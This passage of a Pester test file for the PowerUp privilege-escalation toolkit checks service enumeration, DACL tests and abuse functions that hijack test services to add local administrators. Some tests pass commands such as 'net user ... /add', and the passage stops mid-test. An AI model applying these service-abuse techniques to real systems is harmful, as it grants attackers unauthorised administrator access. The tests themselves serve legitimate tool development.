-Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n\n    It 'Should accept a file object over the pipeline.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        try {\n            $Output = Get-ChildItem -Path $FilePath | Get-ModifiablePath\n            $Output | Should Not BeNullOrEmpty\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n}\n\n\nDescribe 'Get-ProcessTokenGroup' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ProcessTokenGroup' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ProcessTokenGroup} | Should Not Throw\n    }\n\n    It 'Should return SID, Attribute, and ProcessID.' {\n        $Output = Get-ProcessTokenGroup | Select-Object -First 1\n\n        if ($Output.PSObject.Properties.Name -notcontains 'SID') {\n            Throw \"Get-ProcessTokenGroup result doesn't contain 'SID' field.\"\n        }\n\n        if ($Output.PSObject.Properties.Name -notcontains 'Attributes') {\n            Throw \"Get-ProcessTokenGroup result doesn't contain 'Attributes' field.\"\n        }\n\n        if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') {\n            Throw \"Get-ProcessTokenGroup result doesn't contain 'ProcessID' field.\"\n        }\n    }\n\n    It 'Should accept a process object on the pipeline.' {\n        $Output = Get-Process -Id $PID | Get-ProcessTokenGroup | Select-Object -First 1\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should accept multiple process objects on the pipeline.' {\n        $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenGroup | Where-Object {$_.SID -match 'S-1-5-32-544'}\n        if ($Output.Length -lt 2) {\n            Throw \"'Get-ProcessTokenGroup' doesn't return Dacls for multiple service objects on the pipeline.\"\n        }\n    }\n\n    It 'Should return the local administrators group SID.' {\n        $CurrentUserSids = Get-ProcessTokenGroup | Select-Object -ExpandProperty SID\n\n        if ($CurrentUserSids -notcontains 'S-1-5-32-544') {\n            Throw \"Get-ProcessTokenGroup result doesn't contain local administrators 'S-1-5-32-544' sid\"\n        }\n    }\n}\n\n\nDescribe 'Get-ProcessTokenPrivilege' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ProcessTokenPrivilege' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ProcessTokenPrivilege} | Should Not Throw\n    }\n\n    It 'Should return Privilege, Attribute, and ProcessID.' {\n        $Output = Get-ProcessTokenPrivilege | Select-Object -First 1\n\n        if ($Output.PSObject.Properties.Name -notcontains 'Privilege') {\n            Throw \"Get-ProcessTokenPrivilege result doesn't contain 'Privilege' field.\"\n        }\n\n        if ($Output.PSObject.Properties.Name -notcontains 'Attributes') {\n            Throw \"Get-ProcessTokenPrivilege result doesn't contain 'Attributes' field.\"\n        }\n\n        if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') {\n            Throw \"Get-ProcessTokenPrivilege result doesn't contain 'ProcessID' field.\"\n        }\n    }\n\n    It 'Should accept the -Special argument' {\n        $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege -Special | Select-Object -First 1\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should accept a process object on the pipeline.' {\n        $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege | Select-Object -First 1\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should accept multiple process objects on the pipeline.' {\n        $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}\n        if ($Output.Length -lt 2) {\n            Throw \"'Get-ProcessTokenPrivilege' doesn't return Dacls for multiple service objects on the pipeline.\"\n        }\n    }\n\n    It 'Should return the correct privileges.' {\n        $Privileges = Get-ProcessTokenPrivilege | Select-Object -ExpandProperty Privilege\n\n        if ($Privileges -NotContains 'SeShutdownPrivilege') {\n            Throw \"Get-ProcessTokenPrivilege result doesn't the SeShutdownPrivilege\"\n        }\n    }\n}\n\n\nDescribe 'Enable-Privilege' {\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Enable-Privilege' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not accept an invalid privilege.' {\n        {Enable-Privilege -Privilege 'nonexistent'} | Should Throw\n    }\n\n    It 'Should successfully enable a specified privilege.' {\n        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}\n        if ($Output.Attributes -ne 0) {\n            Throw \"'SeShutdownPrivilege is already enabled.\"\n        }\n        {Enable-Privilege -Privilege 'SeShutdownPrivilege'} | Should Not Throw\n        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'}\n        if ($Output.Attributes -eq 0) {\n            Throw \"'SeShutdownPrivilege not successfully enabled.\"\n        }\n    }\n\n    It 'Should accept the output from Get-ProcessTokenPrivilege.' {\n        {Get-ProcessTokenPrivilege | Enable-Privilege} | Should Not Throw\n        $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeBackupPrivilege'}\n        if ($Output.Attributes -eq 0) {\n            Throw \"'SeBackupPrivilege not successfully enabled.\"\n        }\n    }\n}\n\n\nDescribe 'Add-ServiceDacl' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Add-ServiceDacl' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-Service | Add-ServiceDacl} | Should Not Throw\n    }\n\n    It 'Should fail for a non-existent service.' {\n        $ServiceName = Get-RandomName\n        {$Result = Add-ServiceDacl -Name $ServiceName} | Should Throw\n    }\n\n    It 'Should accept a service name as a parameter argument.' {\n        $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name\n        $ServiceWithDacl = Add-ServiceDacl -Name $ServiceName\n\n        if (-not $ServiceWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return a Dacl for a service passed as parameter.\"\n        }\n    }\n\n    It 'Should accept an array of service names as a parameter argument.' {\n        $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name\n        $ServicesWithDacl = Add-ServiceDacl -Name $ServiceNames\n\n        if (-not $ServicesWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return Dacls for an array of service names as a parameter.\"\n        }\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $Service = Get-Service | Select-Object -First 1\n        $ServiceWithDacl = $Service | Add-ServiceDacl\n\n        if (-not $ServiceWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return a Dacl for a service object on the pipeline.\"\n        }\n    }\n\n    It 'Should accept a service name on the pipeline.' {\n        $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name\n        $ServiceWithDacl = $ServiceName | Add-ServiceDacl\n\n        if (-not $ServiceWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return a Dacl for a service name on the pipeline.\"\n        }\n    }\n\n    It 'Should accept multiple service objects on the pipeline.' {\n        $Services = Get-Service | Select-Object -First 5\n        $ServicesWithDacl = $Services | Add-ServiceDacl\n\n        if (-not $ServicesWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return Dacls for multiple service objects on the pipeline.\"\n        }\n    }\n\n    It 'Should accept multiple service names on the pipeline.' {\n        $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name\n        $ServicesWithDacl = $ServiceNames | Add-ServiceDacl\n\n        if (-not $ServicesWithDacl.Dacl) {\n            Throw \"'Add-ServiceDacl' doesn't return Dacls for multiple service names on the pipeline.\"\n        }\n    }\n\n    It 'Should return a correct service Dacl.' {\n        $Service = Get-Service | Select-Object -First 1\n        $ServiceWithDacl = $Service | Add-ServiceDacl\n\n        # 'AllAccess' = [uint32]'0x000F01FF'\n        $Rights = $ServiceWithDacl.Dacl | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-32-544'}\n        if (($Rights.AccessRights -band 0x000F01FF) -ne 0x000F01FF) {\n            Throw \"'Add-ServiceDacl' doesn't return the correct service Dacl.\"\n        }\n    }\n}\n\nDescribe 'Set-ServiceBinaryPath' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Set-ServiceBinaryPath' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should fail for a non-existent service.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n\n        $Result = $False\n        {$Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath} | Should Throw\n        $Result | Should Be $False\n    }\n\n    It 'Should throw with an empty Path.' {\n        $ServiceName = Get-RandomName\n        {Set-ServiceBinaryPath -Name $ServiceName -Path ''} | Should Throw\n    }\n\n    It 'Should correctly set a service binary path.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath\n        $Result | Should Be $True\n        $ServiceDetails = Get-WmiObject -Class win32_service -Filter \"Name='$ServiceName'\"\n        $ServiceDetails.PathName | Should be $ServicePath\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should accept a service name as a string on the pipeline.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = $ServiceName | Set-ServiceBinaryPath -Path $ServicePath\n        $Result | Should Be $True\n\n        $ServiceDetails = Get-WmiObject -Class win32_service -Filter \"Name='$ServiceName'\"\n        $ServiceDetails.PathName | Should be $ServicePath\n        \n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Get-Service $ServiceName | Set-ServiceBinaryPath -Path $ServicePath\n        $Result | Should Be $True\n        \n        $ServiceDetails = Get-WmiObject -Class win32_service -Filter \"Name='$ServiceName'\"\n        $ServiceDetails.PathName | Should be $ServicePath\n        \n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n}\n\n\nDescribe 'Test-ServiceDaclPermission' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Test-ServiceDaclPermission' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should fail for a non-existent service.' {\n        $ServiceName = Get-RandomName\n        {$Result = Test-ServiceDaclPermission -Name $ServiceName} | Should Throw\n    }\n\n    It 'Should throw with an empty name.' {\n        {Test-ServiceDaclPermission -Name ''} | Should Throw\n    }\n\n    It 'Should throw with an invalid permission parameter.' {\n        $ServiceName = Get-RandomName\n        {Test-ServiceDaclPermission -Name $ServiceName -Permissions 'nonexistent'} | Should Throw\n    }\n\n    It 'Should throw with an invalid permission set parameter.' {\n        $ServiceName = Get-RandomName\n        {Test-ServiceDaclPermission -Name $ServiceName -PermissionSet 'nonexistent'} | Should Throw\n    }\n\n    It 'Should succeed with an existing service.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Test-ServiceDaclPermission -Name $ServiceName\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should succeed with an existing service.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n        \n        $Result = Test-ServiceDaclPermission -Name $ServiceName\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should succeed with a permission parameter.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Test-ServiceDaclPermission -Name $ServiceName -Permissions 'AllAccess'\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should succeed with a permission set parameter.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Test-ServiceDaclPermission -Name $ServiceName -PermissionSet 'ChangeConfig'\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should accept a service name as a string on the pipeline.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = $ServiceName | Test-ServiceDaclPermission\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Result = Get-Service $ServiceName | Test-ServiceDaclPermission\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n\n    It \"Should fail for an existing service due to insufficient DACL permissions.\" {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        $UserSid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.value\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n        \n        sc.exe sdset $ServiceName \"D:(A;;CCDCSWRPWPDTLOCRSDRCWDWO;;;$UserSid)\" | Should Match 'SUCCESS'\n        \n        {Test-ServiceDaclPermission -Name $ServiceName} | Should Throw\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    }\n    \n    It \"Should succeed with for an existing service due to sufficient specific DACL permissions.\" {\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n        $UserSid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.value\n        \n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n        \n        sc.exe sdset $ServiceName \"D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$UserSid)\" | Should Match 'SUCCESS'\n\n        $Result = Test-ServiceDaclPermission -Name $ServiceName\n        $Result | Should Not BeNullOrEmpty\n\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n    } \n}\n\n########################################################\n#\n# PowerUp service enumeration functions.\n#\n########################################################\n\nDescribe 'Get-UnquotedService' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-UnquotedService' Pester test needs local administrator privileges.\"\n    }\n\n    It \"Should not throw.\" {\n        {Get-UnquotedService} | Should Not Throw\n    }\n\n    It 'Should return service with a space in an unquoted binPath.' {\n\n        $ServiceName = Get-RandomName\n        $ServicePath = 'C:\\Program Files\\service.exe'\n\n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName }\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n\n        $Output | Should Not BeNullOrEmpty\n        $Output.ServiceName | Should Be $ServiceName\n        $Output.Path | Should Be $ServicePath\n    }\n\n    It 'Should not return services with a quoted binPath.' {\n        $ServiceName = Get-RandomName\n        $ServicePath = \"'C:\\Program Files\\service.exe'\"\n\n        sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n        Start-Sleep -Seconds 1\n\n        $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName }\n        sc.exe delete $ServiceName | Should Match 'SUCCESS'\n\n        $Output | Should BeNullOrEmpty\n    }\n}\n\n\nDescribe 'Get-ModifiableServiceFile' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ModifiableServiceFile ' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ModifiableServiceFile} | Should Not Throw\n    }\n\n    It 'Should return a service with a modifiable service binary.' {\n        try {\n            $ServiceName = Get-RandomName\n            $ServicePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\" + \".exe\"\n            $Null | Out-File -FilePath $ServicePath -Force\n\n            sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS'\n\n            $Output = Get-ModifiableServiceFile | Where-Object { $_.ServiceName -eq $ServiceName } | Select-Object -First 1\n\n            $Properties = $Output.PSObject.Properties | Select-Object -ExpandProperty Name\n            if ($Properties -notcontains 'ServiceName') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'ServiceName' field.\"\n            }\n            if ($Properties -notcontains 'Path') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'Path' field.\"\n            }\n            if ($Properties -notcontains 'ModifiableFile') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'ModifiableFile' field.\"\n            }\n            if ($Properties -notcontains 'ModifiableFilePermissions') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'ModifiableFilePermissions' field.\"\n            }\n            if ($Properties -notcontains 'ModifiableFileIdentityReference') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'ModifiableFileIdentityReference' field.\"\n            }\n            if ($Properties -notcontains 'StartName') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'StartName' field.\"\n            }\n            if ($Properties -notcontains 'AbuseFunction') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'AbuseFunction' field.\"\n            }\n            if ($Properties -notcontains 'CanRestart') {\n                Throw \"Get-ModifiableServiceFile result doesn't contain 'CanRestart' field.\"\n            }\n\n            if ($Output.Path -ne $ServicePath) {\n                Throw \"Get-ModifiableServiceFile result doesn't return correct Path for a modifiable service file.\"\n            }\n\n            if ($Output.ModifiableFile -ne $ServicePath) {\n                Throw \"Get-ModifiableServiceFile result doesn't return correct ModifiableFile for a modifiable service file.\"\n            }\n\n            $Output.CanRestart | Should Be $True\n\n            sc.exe delete $ServiceName | Should Match 'SUCCESS'\n        }\n        finally {\n            $Null = Remove-Item -Path $ServicePath -Force\n        }\n    }\n}\n\n\nDescribe 'Get-ModifiableService' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Get-ModifiableService' Pester test needs local administrator privileges.\"\n    }\n\n    It 'Should not throw.' {\n        {Get-ModifiableService} | Should Not Throw\n    }\n\n    It 'Should return a modifiable service.' {\n        $Output = Get-ModifiableService | Where-Object { $_.ServiceName -eq 'Dhcp'} | Select-Object -First 1\n        $Output | Should Not BeNullOrEmpty\n\n        $Properties = $Output.PSObject.Properties | Select-Object -ExpandProperty Name\n        if ($Properties -notcontains 'ServiceName') {\n            Throw \"Get-ModifiableService result doesn't contain 'ServiceName' field.\"\n        }\n        if ($Properties -notcontains 'Path') {\n            Throw \"Get-ModifiableService result doesn't contain 'Path' field.\"\n        }\n        if ($Properties -notcontains 'StartName') {\n            Throw \"Get-ModifiableService result doesn't contain 'StartName' field.\"\n        }\n        if ($Properties -notcontains 'AbuseFunction') {\n            Throw \"Get-ModifiableService result doesn't contain 'AbuseFunction' field.\"\n        }\n        if ($Properties -notcontains 'CanRestart') {\n            Throw \"Get-ModifiableService result doesn't contain 'CanRestart' field.\"\n        }\n    }\n}\n\n\nDescribe 'Get-ServiceDetail' {\n\n    It 'Should return results for a valid service.' {\n        $Output = Get-ServiceDetail -Name 'Dhcp'\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should throw with an empty Name.' {\n        $ServiceName = Get-RandomName\n        {Get-ServiceDetail -Name ''} | Should Throw\n    }\n\n    It 'Should throw for an invalid service.' {\n        {Get-ServiceDetail -Name 'NonExistent123'} | Should Throw\n    }\n\n    It 'Should accept a service name on the pipeline.' {\n        $Output = 'Dhcp' | Get-ServiceDetail\n        $Output | Should Not BeNullOrEmpty\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $Output = Get-Service 'Dhcp' | Get-ServiceDetail\n        $Output | Should Not BeNullOrEmpty\n    }\n}\n\n\n\n########################################################\n#\n# PowerUp service abuse functions.\n#\n########################################################\n\nDescribe 'Invoke-ServiceAbuse' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Invoke-ServiceAbuse' Pester test needs local administrator privileges.\"\n    }\n\n    BeforeEach {\n        $ServicePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\" + \".exe\"\n        $Null = sc.exe create 'PowerUpService' binPath= $ServicePath\n    }\n\n    AfterEach {\n        $Null = sc.exe delete 'PowerUpService'\n        $Null = $(net user john /delete >$Null 2>&1)\n    }\n\n    It 'Should abuse a vulnerable service to add a local administrator with default options.' {\n        $Output = Invoke-ServiceAbuse -Name 'PowerUpService'\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n    }\n\n    It 'Should accept the -Force switch.' {\n        $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -Force\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n    }\n\n    It 'Should accept a service name on the pipeline.' {\n        $Output = 'PowerUpService' | Invoke-ServiceAbuse\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $Output = Get-Service 'PowerUpService' | Invoke-ServiceAbuse\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n    }\n\n    It 'User should not be created for a non-existent service.' {\n        {Invoke-ServiceAbuse -ServiceName 'NonExistentService456'} | Should Throw\n\n        if ( ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' should not have been created for non-existent service.\"\n        }\n    }\n\n    It 'Should accept custom user/password arguments.' {\n        $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Username 'PowerUp' -Password 'PASSword123!'\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {\n            Throw \"Local user 'PowerUp' not created.\"\n        }\n        $Null = $(net user PowerUp /delete >$Null 2>&1)\n    }\n\n    It 'Should accept a credential object.' {\n        $Username = 'PowerUp123'\n        $Password = ConvertTo-SecureString 'PASSword123!' -AsPlaintext -Force \n        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $Password\n\n        $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Credential $Credential\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {\n            Throw \"Local user 'PowerUp' not created.\"\n        }\n        $Null = $(net user PowerUp123 /delete >$Null 2>&1)\n    }\n\n    It 'Should accept an alternate LocalGroup.' {\n        $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -LocalGroup 'Guests'\n        $Output.Command | Should Match 'net'\n\n        if ( -not ($(net localgroup Guests) -match 'john')) {\n            Throw \"Local user 'john' not added to 'Guests'.\"\n        }\n    }\n\n    It 'Should accept a custom command.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Command 'net user testing Password123! /add'\n\n        if ( -not ($(net user) -match \"testing\")) {\n            Throw 'Custom command failed.'\n        }\n        $Null = $(net user testing /delete >$Null 2>&1)\n    }\n}\n\n\nDescribe 'Install-ServiceBinary' {\n\n    if (-not $(Test-IsAdmin)) {\n        Throw \"'Install-ServiceBinary' Pester test needs local administrator privileges.\"\n    }\n\n    BeforeEach {\n        $ServicePath = \"$(Get-Location)\\powerup.exe\"\n        $Null | Out-File -FilePath $ServicePath -Force\n        $Null = sc.exe create 'PowerUpService' binPath= $ServicePath\n    }\n\n    AfterEach {\n        try {\n            $Null = Stop-Service -Name PowerUpService -Force\n            $Null = sc.exe delete 'PowerUpService'\n            $Null = $(net user john /delete >$Null 2>&1)\n        }\n        finally {\n            if (Test-Path \"$(Get-Location)\\powerup.exe\") {\n                $Null = Remove-Item -Path \"$(Get-Location)\\powerup.exe\" -Force -ErrorAction SilentlyContinue\n            }\n            if (Test-Path \"$(Get-Location)\\powerup.exe.bak\") {\n                $Null = Remove-Item -Path \"$(Get-Location)\\powerup.exe.bak\" -Force -ErrorAction SilentlyContinue\n            }\n        }\n    }\n\n    It 'Should abuse a vulnerable service binary to add a local administrator with default options.' {\n        $Output = Install-ServiceBinary -ServiceName 'PowerUpService'\n        $Output.Command | Should Match 'net'\n\n        $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n        Start-Sleep -Seconds 3\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n        $Null = Stop-Service -Name PowerUpService -Force\n\n        $Output = Restore-ServiceBinary -ServiceName PowerUpService\n        \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n    }\n\n    It 'Should accept a service Name on the pipeline.' {\n        $Output = 'PowerUpService' | Install-ServiceBinary\n        $Output.Command | Should Match 'net'\n\n        $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n        Start-Sleep -Seconds 3\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n        $Null = Stop-Service -Name PowerUpService -Force\n\n        $Output = Restore-ServiceBinary -ServiceName PowerUpService\n        \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n    }\n\n    It 'Should accept a service object on the pipeline.' {\n        $Output = Get-Service 'PowerUpService' | Install-ServiceBinary\n        $Output.Command | Should Match 'net'\n\n        $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n        Start-Sleep -Seconds 3\n        if ( -not ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' not created.\"\n        }\n        $Null = Stop-Service -Name PowerUpService -Force\n\n        $Output = Restore-ServiceBinary -ServiceName PowerUpService\n        \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n    }\n\n    It 'User should not be created for a non-existent service.' {\n        {Install-ServiceBinary -ServiceName \"NonExistentService456\"} | Should Throw\n        \n        if ( ($(net localgroup Administrators) -match 'john')) {\n            Throw \"Local user 'john' should not have been created for non-existent service.\"\n        }\n    }\n\n    It 'Should accept custom user/password arguments.' {\n        try {\n            $Output = Install-ServiceBinary -ServiceName 'PowerUpService' -Username 'PowerUp' -Password 'PASSword123!'\n            $Output.Command | Should Match 'net'\n\n            $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n            Start-Sleep -Seconds 3\n            if ( -not ($(net localgroup Administrators) -match 'PowerUp')) {\n                Throw \"Local user 'PowerUp' not created.\"\n            }\n\n            $Output = Restore-ServiceBinary -ServiceName PowerUpService\n            \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n        }\n        finally {\n            $Null = $(net user PowerUp /delete >$Null 2>&1)\n        }\n    }\n\n    It 'Should accept a credential object.' {\n        $Username = 'PowerUp123'\n        $Password = ConvertTo-SecureString 'PASSword123!' -AsPlaintext -Force \n        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $Password\n\n        $Output = Install-ServiceBinary -ServiceName 'PowerUpService' -Credential $Credential\n        $Output.Command | Should Match 'net'\n\n        $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n        Start-Sleep -Seconds 3\n        if ( -not ($(net localgroup Administrators) -match 'PowerUp123')) {\n            Throw \"Local user 'PowerUp123' not created.\"\n        }\n        $Null = $(net user PowerUp123 /delete >$Null 2>&1)\n\n        $Output = Restore-ServiceBinary -ServiceName PowerUpService\n        \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n    }\n\n    It 'Should accept an alternate LocalGroup.' {\n        try {\n            $Output = Install-ServiceBinary -ServiceName 'PowerUpService' -Username 'PowerUp' -Password 'PASSword123!' -LocalGroup 'Guests'\n            $Output.Command | Should Match 'net'\n\n            $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n            Start-Sleep -Seconds 3\n            if ( -not ($(net localgroup Guests) -match 'PowerUp')) {\n                Throw \"Local user 'PowerUp' not created.\"\n            }\n\n            $Output = Restore-ServiceBinary -ServiceName PowerUpService\n            \"$(Get-Location)\\powerup.exe.bak\" | Should Not Exist\n        }\n        finally {\n            $Null = $(net user PowerUp /delete >$Null 2>&1)\n        }\n    }\n\n    It 'Should accept a custom command.' {\n        try {\n            $Output = Install-ServiceBinary -ServiceName 'PowerUpService' -Command \"net user testing Password123! /add\"\n            $Output.Command | Should Match 'net'\n\n            $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue\n            Start-Sleep 